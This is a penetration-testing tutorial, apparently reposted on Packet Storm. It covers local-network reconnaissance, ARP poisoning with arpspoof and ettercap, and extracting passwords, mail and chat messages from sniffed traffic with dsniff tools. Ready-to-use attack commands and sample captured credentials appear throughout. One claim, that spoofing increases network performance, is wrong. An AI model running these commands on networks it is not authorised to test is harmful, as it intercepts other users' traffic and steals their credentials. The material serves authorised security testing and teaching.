Whitepaper called Pentesting in Local Networks Part 1. It discusses performing recon, ARP poisoning, traffic analysis techniques, and more.
61bd8550d6d7da3a35747d2f5abbe23c40f3b034a054bb63345a6aab75a7e160---------------------------------------
| Team ph0x90bic proudly presents |
| Pentesting in Local Networks Part 1 |
| Reconaissance and ARP Poisoning |
---------------------------------------
INTRODUCTION
This paper describes standard Reconaissance, ARP-Poisoning and traffic
analysis technics with dsniff, ettercap and netdiscover on local networks.
You find all needed tools preinstalled on nodezero linux.
Tools needed:
* netdiscover (Search for hosts on local network)
* tcpdump/tshark (Sniff network traffic)
* dsniff/ettercap (Launch ARP-Poisoning and analyze pcap files)
---
CHECK LOCAL NETWORK CONFIGURATION
First check your local network configuration to gain information about
the local network you are connected.
# sudo ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:18308 errors:0 dropped:0 overruns:0 frame:0
TX packets:18308 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9599453 (9.5 MB) TX bytes:9599453 (9.5 MB)
wlan0 Link encap:Ethernet HWaddr 90:4c:e5:a5:9c:2b
inet addr:10.0.0.1 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::924c:e5ff:fea5:9c2b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:32320 errors:0 dropped:0 overruns:0 frame:0
TX packets:30280 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:21141126 (21.1 MB) TX bytes:16626291 (16.6 MB)
# sudo route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
10.0.0.0 0.0.0.0 255.255.255.0 U 2 0 0 wlan0
169.254.0.0 0.0.0.0 255.255.0.0 U 1000 0 0 wlan0
0.0.0.0 10.0.0.254 0.0.0.0 UG 0 0 0 wlan0
RESULTS
Ownipv4: 10.0.0.1
Ownipv6: fe80::924c:e5ff:fea5:9c2b/64
Gateway: 10.0.0.254
Netmask: 255.255.255.0
Network: 10.0.0.0/24
Interface: wlan0
---
COLLECT PASSIVE INFORMATION
You can collect information without sending network traffic by sniffing
the network traffic with tshark or tcpdump. Netdiscover lists you the
alive hosts in realtime and shows you the MAC Vendor.
# sudo tshark -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tshark -n -i wlan0 not src 10.0.0.1
# sudo tcpdump -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tcpdump -n -i wlan0 not src 10.0.0.1
# sudo netdiscover -p -i wlan0
--- SNIPPED TCPDUMP OUTPUT START ---
...
16:43:46.886878 ARP, Request who-has 10.0.0.254 tell 10.0.0.254, length 28
16:43:46.888905 ARP, Request who-has 10.0.0.2 tell 10.0.0.254, length 28
16:43:46.889431 ARP, Request who-has 10.0.0.3 tell 10.0.0.254, length 28
16:43:46.891183 ARP, Request who-has 10.0.0.4 tell 10.0.0.254, length 28
...
--- SNIPPED TCPDUMP OUTPUT END ---
--- NETDISCOVER OUTPUT START ---
Currently scanning: (passive) | Screen View: Unique Hosts
174 Captured ARP Req/Rep packets, from 5 hosts. Total size: 7344
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
10.0.0.254 00:1f:9f:e9:1e:a6 157 6594 Thomson Telecom Belgium
10.0.0.3 00:24:21:ba:04:bd 02 120 Unknown vendor
10.0.0.2 00:18:de:60:9f:7d 02 084 Intel Corporation
0.0.0.0 00:18:de:60:9f:7d 03 126 Intel Corporation
10.0.0.4 00:90:4b:94:2d:0d 10 420 GemTek Technology Co., Ltd.
--- NETDISCOVER OUTPUT END ---
RESULTS
Hosts: 10.0.0.2 (00:18:de:60:9f:7d)
10.0.0.3 (00:24:21:ba:04:bd)
10.0.0.4 (00:90:4b:94:2d:0d)
---
ARPSPOOFING ALL HOSTS
You can arpspoof all hosts on the local network. This is dangerous in large
networks, because it increases network performance. But in small networks
spoofing all hosts is possible without any problems.
# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo arpspoof -i wlan0 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 // /10.0.0.254/
RESULTS
Sniffed traffic from all hosts on network as pcap file in landump.pcap
---
ARPSPOOF SPECIFIC HOST
On larger networks use this attack to arpspoof a specific host only.
# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo arpspoof -i wlan0 -t 10.0.0.2 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 /10.0.0.2/ /10.0.0.254/
RESULTS
Sniffed traffic from 10.0.0.2 only as pcap file in landump.pcap
---
DSNIFF
You can analyze pcap files easily with the dsniff tools or manually with
string, grep or similar tools.
# sudo dsniff -n -p landump.pcap (Passwords)
# sudo urlsnarf -n -p landump.pcap (HTTP Requests)
# sudo filesnarf -n -p landump.pcap (NFS Files)
# sudo mailsnarf -n -p landump.pcap (SMTP/POP mails)
# sudo msgsnarf -n -p landump.pcap (Chat messages)
# sudo strings landump.pcap | grep -i 'yourstring' (Manual analysis)
--- DSNIFF OUTPUT START ---
03/18/11 20:48:12 tcp 10.0.0.2.50222 -> openbsd.sunsite.ualberta.ca.21 (ftp)
USER anonymous
PASS SUPERGEHEIM
--- DSNIFF OUTPUT END ---
RESULTS
Cleartext information in sniffed pcap traffic.
---
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed